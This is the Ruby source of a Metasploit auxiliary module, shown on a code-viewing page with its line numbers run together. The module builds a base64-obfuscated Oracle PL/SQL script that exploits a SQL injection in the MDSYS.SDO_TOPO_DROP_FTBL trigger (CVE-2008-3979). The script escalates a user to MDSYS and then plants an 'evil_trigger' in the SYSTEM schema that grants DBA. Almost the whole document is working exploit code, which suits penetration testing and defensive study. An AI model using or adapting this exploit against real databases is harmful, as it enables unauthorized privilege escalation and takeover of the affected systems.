Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/sqli/oracle/droptable_trigger.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::FILEFORMAT78def initialize(info = {})9super(update_info(info,10'Name' => 'Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger',11'Description' => %q{12This module will escalate an Oracle DB user to MDSYS by exploiting a sql injection bug in13the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege14given to MDSYS user by creating evil trigger in system scheme (2-stage attack).15},16'Author' => [ 'Sh2kerr <research[ad]dsec.ru>' ],17'License' => MSF_LICENSE,18'References' =>19[20[ 'CVE', '2008-3979' ],21[ 'OSVDB', '51354' ],22[ 'URL', 'http://www.securityfocus.com/archive/1/500061' ],23[ 'URL', 'http://www.ngssoftware.com/' ],24],25'DisclosureDate' => '2009-01-13'))2627register_options(28[29OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),30OptString.new('USER', [ false, 'The current user. ', 'SCOTT']),31OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql'])32])33end3435def run36name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)37name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)38rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)39rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)40rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)41rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)42rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)4344function1 = %Q|45CREATE OR REPLACE PROCEDURE #{name1}46AUTHID CURRENT_USER AS47PRAGMA AUTONOMOUS_TRANSACTION;48BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';49END;50|515253function2 = %Q|54CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is55PRAGMA AUTONOMOUS_TRANSACTION;56STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10);57BEGIN #{datastore['USER']}.#{name1};58end evil_trigger;';59BEGIN60EXECUTE IMMEDIATE STMT;61COMMIT;62RETURN 1;63END;64|6566prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"6768exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""6970exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"7172fun1 = Rex::Text.encode_base64(function1)73fun2 = Rex::Text.encode_base64(function2)74prp = Rex::Text.encode_base64(prepare)75exp1 = Rex::Text.encode_base64(exploiting1)76exp2 = Rex::Text.encode_base64(exploiting2)777879sql = %Q|80DECLARE81#{rand1} VARCHAR2(32767);82#{rand2} VARCHAR2(32767);83#{rand3} VARCHAR2(32767);84#{rand4} VARCHAR2(32767);85#{rand5} VARCHAR2(32767);86BEGIN87#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun1}')));88EXECUTE IMMEDIATE #{rand1};89EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name1} TO PUBLIC';90#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun2}')));91EXECUTE IMMEDIATE #{rand2};92EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name2} TO PUBLIC';93#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));94EXECUTE IMMEDIATE #{rand3};95#{rand4} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));96EXECUTE IMMEDIATE #{rand4};97#{rand5} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp2}')));98EXECUTE IMMEDIATE #{rand5};99END;100/101DROP FUNCTION #{name1};102DROP FUNCTION #{name2};103|104105106print_status("Creating '#{datastore['FILENAME']}' file ...")107file_create(sql)108109110end111end112113114